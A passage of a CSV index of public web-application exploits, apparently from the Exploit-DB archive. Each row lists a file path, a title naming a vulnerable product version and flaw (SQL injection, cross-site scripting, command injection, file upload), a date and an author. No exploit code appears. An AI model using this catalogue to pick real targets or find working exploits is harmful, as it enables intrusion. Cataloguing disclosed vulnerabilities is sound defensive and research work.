Injection",2017-03-20,"Ihsan Sencan",webapps,php, +41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80 +41662,exploits/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",webapps,hardware, +41663,exploits/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' SQL Injection",2017-03-21,"Ihsan Sencan",webapps,php, +41665,exploits/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",webapps,php, +41671,exploits/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",webapps,hardware, +41673,exploits/php/webapps/41673.txt,"Joomla! Component Modern Booking 1.0 - 'coupon' SQL Injection",2017-03-22,"Hamed Izadi",webapps,php, +41674,exploits/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",webapps,php, +41676,exploits/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,webapps,linux, +41677,exploits/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,webapps,linux, +41787,exploits/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' SQL Injection",2017-04-04,"Ihsan Sencan",webapps,php, +41788,exploits/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' SQL Injection",2017-04-04,"Ihsan Sencan",webapps,php, +41789,exploits/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' SQL Injection",2017-04-04,"Ihsan Sencan",webapps,php, +41685,exploits/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,webapps,multiple, +41686,exploits/multiple/webapps/41686.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,webapps,multiple, +41687,exploits/multiple/webapps/41687.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,webapps,multiple, +41688,exploits/multiple/webapps/41688.rb,"PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)",2016-12-26,Metasploit,webapps,multiple, +41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple, +41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple, +41697,exploits/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,webapps,linux, +41698,exploits/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,webapps,linux, +41714,exploits/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,webapps,windows, +42804,exploits/php/webapps/42804.txt,"WordPress Plugin School Management System - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42058,exploits/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,webapps,jsp, +42547,exploits/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",webapps,hardware, +42545,exploits/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",webapps,php, +42453,exploits/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",webapps,windows, +42621,exploits/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",webapps,php, +42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php, +42544,exploits/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,webapps,java, +41899,exploits/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",webapps,multiple, +41716,exploits/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",webapps,php, +41717,exploits/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",webapps,php, +41724,exploits/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41725,exploits/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",webapps,php, +41726,exploits/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41727,exploits/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41728,exploits/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41729,exploits/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41731,exploits/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41732,exploits/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41733,exploits/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, +41735,exploits/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, +41736,exploits/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, +41746,exploits/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,webapps,php, +41747,exploits/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,webapps,php, +41748,exploits/jsp/webapps/41748.rb,"Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,webapps,jsp, +41749,exploits/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",webapps,php, +41758,exploits/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' SQL Injection",2017-03-29,"Ihsan Sencan",webapps,php, +41774,exploits/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",webapps,php, +41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple, +41780,exploits/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",webapps,php, +41816,exploits/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php, +41817,exploits/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php, +41818,exploits/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php, +41819,exploits/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php, +41820,exploits/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php, +41821,exploits/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",webapps,hardware, +41822,exploits/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",webapps,php, +41828,exploits/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",webapps,php, +41824,exploits/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,webapps,php, +41829,exploits/hardware/webapps/41829.txt,"Intellinet NFC-30IR Camera - Multiple Vulnerabilities",2017-04-07,"Dimitri Fousekis",webapps,hardware, +41830,exploits/php/webapps/41830.txt,"Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery",2017-04-05,rungga_reksya,webapps,php, +41831,exploits/php/webapps/41831.txt,"Invoice Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41832,exploits/php/webapps/41832.txt,"Document Management Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41833,exploits/php/webapps/41833.txt,"Shopping Cart Template - 'item' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41834,exploits/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41835,exploits/php/webapps/41835.txt,"Forum Template 1.0 - SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41836,exploits/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41837,exploits/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41838,exploits/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41839,exploits/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' SQL Injection",2017-04-07,"Ihsan Sencan",webapps,php, +41840,exploits/hardware/webapps/41840.txt,"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download",2017-04-07,"Patryk Bogdan",webapps,hardware, +41841,exploits/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,webapps,php,80 +41842,exploits/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",webapps,cgi, +42085,exploits/hardware/webapps/42085.py,"uc-http Daemon - Local File Inclusion / Directory Traversal",2017-05-30,"Project Insecurity",webapps,hardware, +41844,exploits/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",webapps,php, +41845,exploits/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",webapps,php,80 +41846,exploits/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",webapps,php,80 +42089,exploits/xml/webapps/42089.txt,"Trend Micro Deep Security 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution",2017-05-30,SecuriTeam,webapps,xml, +42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple, +42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows, +41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php, +41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400 +41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, +41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, +41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, +41857,exploits/php/webapps/41857.txt,"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection",2017-04-11,"Manuel García Cárdenas",webapps,php,80 +41860,exploits/php/webapps/41860.txt,"MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting",2017-04-11,"Zhiyang Zeng",webapps,php,80 +41862,exploits/php/webapps/41862.txt,"MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal",2017-04-11,"Zhiyang Zeng",webapps,php,80 +41863,exploits/hardware/webapps/41863.php,"Brother MFC-J6520DW - Authentication Bypass / Password Change",2017-04-11,"Patryk Bogdan",webapps,hardware, +41864,exploits/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions",2017-04-11,SecuriTeam,webapps,php, +41865,exploits/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",webapps,multiple, +41866,exploits/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",webapps,multiple, +41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses",2017-02-15,"Hacker Fantastic",webapps,php, +41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784 +41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple, +41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple, +41884,exploits/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",webapps,php, +41885,exploits/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,webapps,php, +41890,exploits/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,webapps,php, +41900,exploits/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",webapps,multiple, +41918,exploits/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",webapps,php, +41919,exploits/php/webapps/41919.txt,"WordPress Plugin KittyCatfish 2.2 - SQL Injection",2017-04-25,"TAD GROUP",webapps,php,80 +41920,exploits/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",webapps,php,80 +41921,exploits/php/webapps/41921.txt,"WordPress Plugin Wow Viral Signups 2.1 - SQL Injection",2017-04-25,"TAD GROUP",webapps,php,80 +41922,exploits/php/webapps/41922.txt,"WordPress Plugin Wow Forms 2.1 - SQL Injection",2017-04-25,"TAD GROUP",webapps,php,80 +41925,exploits/xml/webapps/41925.txt,"Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE (PoC)",2017-04-25,ERPScan,webapps,xml, +41926,exploits/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,webapps,jsp, +41927,exploits/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",webapps,multiple, +41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple, +41930,exploits/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' SQL Injection",2017-04-24,"Persian Hack Team",webapps,php, +41936,exploits/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",webapps,php,80 +41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php, +41940,exploits/php/webapps/41940.py,"TYPO3 Extension News - SQL Injection",2017-04-27,"Charles Fol",webapps,php,80 +41943,exploits/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",webapps,php, +41944,exploits/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",webapps,php, +41946,exploits/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,webapps,multiple, +41947,exploits/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,webapps,multiple, +41948,exploits/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,webapps,multiple, +41950,exploits/linux/webapps/41950.py,"Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",webapps,linux, +41953,exploits/php/webapps/41953.md,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",webapps,php, +41958,exploits/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,webapps,java, +41960,exploits/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,webapps,java, +41961,exploits/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,webapps,windows, +41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",webapps,linux, +41963,exploits/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",webapps,linux, +41966,exploits/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,webapps,php,80 +41967,exploits/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 +41976,exploits/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",webapps,linux, +41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php, +41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx, +41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx, +41988,exploits/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",webapps,php,8080 +41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php, +41990,exploits/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,webapps,php, +41997,exploits/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",webapps,php, +41998,exploits/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,webapps,hardware, +42003,exploits/php/webapps/42003.txt,"PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",webapps,php,80 +42004,exploits/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,webapps,php, +42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php, +42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php, +42013,exploits/hardware/webapps/42013.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities",2017-01-12,SlidingWindow,webapps,hardware, +42028,exploits/xml/webapps/42028.txt,"INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection",2017-05-17,Yoroi,webapps,xml, +42029,exploits/xml/webapps/42029.txt,"INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields",2017-05-17,Yoroi,webapps,xml, +42082,exploits/php/webapps/42082.txt,"WordPress Plugin Huge-IT Video Gallery 2.0.4 - SQL Injection",2017-05-29,defensecode,webapps,php,80 +42033,exploits/php/webapps/42033.txt,"Joomla! 3.7.0 - 'com_fields' SQL Injection (PoC)",2017-05-19,"Mateus Lino",webapps,php,80 +42034,exploits/java/webapps/42034.txt,"Oracle PeopleSoft - Server-Side Request Forgery",2017-05-19,ERPScan,webapps,java, +42035,exploits/php/webapps/42035.txt,"Belden Garrettcom 6K/10K Switches - Authentication Bypass / Memory Corruption",2017-05-19,"David Tomaschik",webapps,php, +42036,exploits/xml/webapps/42036.txt,"SAP Business One for Android 1.2.3 - XML External Entity Injection",2017-05-19,"Ravindra Singh Rathore",webapps,xml, +42037,exploits/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,webapps,java, +42038,exploits/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",webapps,php,80 +42039,exploits/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",webapps,hardware, +42042,exploits/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,webapps,php, +42043,exploits/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,webapps,php, +42044,exploits/php/webapps/42044.txt,"PlaySMS 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",webapps,php, +42062,exploits/hardware/webapps/42062.txt,"Sophos Cyberoam - Cross-site scripting",2017-05-25,"Bhadresh Patel",webapps,hardware, +42064,exploits/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, +42065,exploits/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, +42066,exploits/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, +42067,exploits/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, +42068,exploits/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",webapps,multiple, +42069,exploits/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, +42074,exploits/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,webapps,hardware, +42075,exploits/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",webapps,hardware, +42093,exploits/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",webapps,php,8181 +42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",webapps,php, +42095,exploits/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,webapps,php, +42096,exploits/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,webapps,php, +42097,exploits/php/webapps/42097.txt,"OV3 Online Administration 3.0 - SQL Injection",2017-05-31,LiquidWorm,webapps,php, +42098,exploits/php/webapps/42098.txt,"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting",2017-05-31,"Touhid M.Shaikh",webapps,php, +42101,exploits/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",webapps,linux, +42105,exploits/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple, +42106,exploits/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple, +42107,exploits/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple, +42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json, +42113,exploits/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' SQL Injection",2017-06-03,"Persian Hack Team",webapps,php, +42114,exploits/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,webapps,hardware, +42117,exploits/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,webapps,windows, +42118,exploits/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,webapps,windows, +42120,exploits/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,webapps,windows, +42127,exploits/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",webapps,asp, +42129,exploits/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,webapps,php,80 +42130,exploits/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",webapps,cgi,443 +42131,exploits/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",webapps,php, +42132,exploits/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,webapps,php, +42133,exploits/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",webapps,php, +42143,exploits/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",webapps,php, +42149,exploits/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,webapps,linux, +42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware, +42151,exploits/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",webapps,php, +42153,exploits/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",webapps,windows, +42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",webapps,windows, +42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,webapps,php, +42164,exploits/php/webapps/42164.txt,"Nuevomailer < 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",webapps,php, +42166,exploits/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",webapps,php, +42167,exploits/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,webapps,php, +42172,exploits/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",webapps,php, 